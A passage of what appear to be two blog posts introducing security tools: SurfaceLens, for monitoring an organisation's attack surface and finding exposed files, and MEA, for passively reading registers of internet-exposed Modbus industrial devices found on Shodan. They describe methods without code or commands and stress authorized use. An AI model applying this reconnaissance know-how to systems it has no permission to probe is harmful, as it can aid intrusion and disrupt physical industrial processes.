SurfaceLens stores assets in a local SQLite database with first-seen and last-seen timestamps. New exposures surface immediately. An asset that vanished and came back shows up as a change worth investigating. Recon becomes monitoring instead of a one-time snapshot.

Run each asset through the pipeline

Every asset that comes in goes through a series of modular checks.

The SSL Auditor pulls certificate data and evaluates TLS configuration. Weak ciphers, expired certs, misconfigured chains. Anything that would make a security-conscious person wince.

The DNS Correlator does attribution analysis. This is the part I find most interesting. It tries to determine whether an asset actually belongs to the organization you're analyzing, or whether it's drifted outside controlled boundaries. This is where Shadow IT becomes visible in the data rather than just suspected.

The Fingerprinter identifies technologies and service layers. What's running behind the asset? A reverse proxy? A specific web server version? This context changes how you interpret everything else.

The Sensitive File Hunter checks for common exposure patterns. .env files, robots.txt entries that reveal more than intended, backup files sitting in predictable locations. Simple checks that still catch real things regularly.

The Risk Prioritizer pulls all of this together into a weighted score between 0 and 10. Not a magic number that tells you what to do, but a signal that tells you where to look first when you have fifty assets and time for five.

The shift that changed how I think about this

When I started building SurfaceLens I was thinking about discovery. Find the things, list the things, report the things.

Somewhere in the middle of building the DNS Correlator I started thinking differently.

Individual findings don't tell you much. An open port is an open port. A TLS misconfiguration is a TLS misconfiguration. But when you start correlating DNS attribution with service exposure with certificate data with historical visibility, you start seeing something that looks less like a list of issues and more like a map of how an attacker would move.

That's where exposure stops being a checkbox and starts being an attack path.

I don't think I fully understood that distinction until I had to implement it. Which is probably the best argument for building tools rather than just using them.

Output

The same underlying data comes out three ways depending on what you need.

CLI output for quick assessments when you want high-signal results without overhead. Markdown reports for documentation and audit trails. A Flask web dashboard for anything that benefits from a persistent, navigable view of assets, risk scores, and historical changes.

Same data model, different interfaces. Nothing gets lost between them.

What it isn't

SurfaceLens is passive-first. It relies on aggregated intelligence sources and non-intrusive active checks. It's not an aggressive scanner. It's not trying to enumerate everything as fast as possible.

That's a deliberate choice. In real environments, volume creates noise. Noise buries signal. The tool is more useful if it's telling you fewer, more meaningful things than if it's generating a report that takes three days to triage.

Where it goes next

SurfaceLens V2 is a foundation. The areas I'm actively thinking about are better attribution models for asset ownership, risk scoring that's more context-aware than weighted signals alone, and tighter integration with automated security workflows.

The detection coverage for infrastructure misconfigurations has room to grow too. There's a long list of checks that would add value without adding noise, and working through that list is ongoing.

Use this responsibly. SurfaceLens is built for defensive research and authorized assessments. Don't point it at infrastructure you don't have permission to analyze.

The project

github.com/404saint/surfacelens_v2

If you're working in infrastructure security or attack surface management, take a look. Issues and PRs are open. I'm especially interested in feedback from people who've tried to solve the attribution problem differently.

Built by RUGERO Tesla · GitHub: @404Saint
Offensive security researcher focused on infrastructure, network security, attack surface analysis, and Shadow IT discovery.

MEA: Modbus Exposure Analyzer — Passive ICS/OT Security Analysis

404Saint — Sat, 28 Feb 2026 23:40:01 +0000

By RUGERO Tesla (@404Saint)

The problem with Modbus being on the internet

Modbus was designed in 1979. It was designed for closed, serial networks where the assumption was that if you could physically reach the device, you were supposed to be there. There was no authentication. No encryption. No concept of an untrusted caller.

That assumption held for a long time. Then came Ethernet. Then came remote monitoring. Then came cloud connectivity and the slow, steady erosion of the air-gap that industrial engineers spent decades taking for granted.

Today you can find Modbus devices on Shodan. Public IP addresses, port 502, responding to anyone who asks. Some of them are real PLCs in real facilities. Some are misconfigured. Some are honeypots. And telling those three apart without disrupting whatever process they're attached to is not as straightforward as it sounds.

That's the problem MEA is built to solve.

What MEA actually does

MEA is a passive behavioral analysis tool for Modbus devices. Passive matters here more than it might in an IT context. In ICS/OT environments, sending unexpected traffic to a live device isn't just a network etiquette issue — it can interrupt physical processes. You don't probe a PLC controlling a pump the same way you'd run nmap against a web server.

MEA works by observing. It reads register data, measures behavioral patterns over time, analyzes entropy, and monitors for changes. It doesn't write anything. It doesn't send commands. It gathers enough signal to tell you something meaningful about a device without touching its operation.

The three things it's trying to answer are:

Is this device real or simulated? Honeypots and simulators behave differently from genuine industrial hardware under sustained observation. Register values on real devices drift in ways that reflect actual physical processes. Simulated registers tend to be static, randomized, or artificially varied in patterns that don't match how real sensors behave.

How exposed is it? What's reachable, what's responding, and does the exposure match what you'd expect from a device in this kind of environment?

What's the actual risk? Not a generic vulnerability score, but something grounded in what the device is doing and what access to it would mean.

How it works

Behavioral fingerprinting

The first thing MEA does when it connects to a device is start watching register values over multiple read cycles. Real industrial devices have a characteristic kind of noise. Temperature sensors drift. Flow meters fluctuate. A PLC running an active process shows register activity that reflects something happening in the physical world.

Simulators don't replicate this well. They either hold values constant, cycle through obvious patterns, or randomize in ways that don't match the statistical profile of real sensor data. MEA measures this and uses it as a signal for the real-vs-simulated classification.

Entropy analysis

Each register read gets an entropy score. The goal is finding anomalies — registers behaving in ways that don't fit the surrounding context. An unusually high-entropy register on a device where everything else is low-entropy is worth investigating. It might be normal. It might not be.

This is the same reasoning that drives entropy analysis in malware detection. Encrypted or packed data scores high because it's information-dense in a way that structured data usually isn't. The same principle applies to register data that doesn't match its neighbors.

Register monitoring over time

A single snapshot of a Modbus device tells you less than you'd think. MEA watches registers across multiple cycles and tracks changes. This catches things a one-time scan misses entirely — registers that only update under specific conditions, values that change in response to external events, patterns that only become visible when you're watching over minutes rather than seconds.

It also catches something more subtle: devices that look normal at first glance but show anomalous behavior under sustained observation. That gap between the initial impression and the longer-term pattern is where a lot of the interesting findings live.

Risk assessment

The risk output from MEA isn't a generic score plugged into a CVSS calculator. It's built from the combination of what the device is, how it's exposed, what its register behavior looks like, and what access to it would actually mean. A Modbus device responding on a public IP with registers that map to physical actuators is a different risk than the same device in a monitored DMZ with read-only exposure.

Context matters in ICS security in ways it often doesn't in IT security, and the risk output is designed to reflect that.

Who it's for

Security researchers doing passive reconnaissance on ICS infrastructure. Pentesters working authorized assessments who need to gather intelligence without risking operational disruption. Blue teams trying to understand their own exposure before someone else does.

The audit-ready report output is there for the third group especially. Finding something is half the work. Documenting it in a format that an operations team will actually read and act on is the other half.

A note on how to use this

MEA is a tool for authorized security work. ICS and OT environments carry real-world consequences in a way that most IT environments don't. Using this against infrastructure you don't have permission to analyze isn't just legally problematic — it's potentially dangerous to people and processes on the other side of that connection.

If you're doing research on public-facing devices via platforms like Shodan, understand what you're looking at before you connect to it. The passive-first design of MEA is deliberate, but passive still means connecting, and connecting to live industrial hardware uninvited is a line worth thinking carefully about before crossing.

The project

github.com/404saint/mea

The full codebase, documentation, and usage examples are there. If you're working in ICS/OT security and you've approached the real-vs-simulated problem differently, I'd be interested in hearing about it.

All my projects: github.com/404saint

Built by RUGERO Tesla · GitHub: @404Saint
Offensive security researcher focused on ICS/OT, infrastructure security, and attack surface analysis.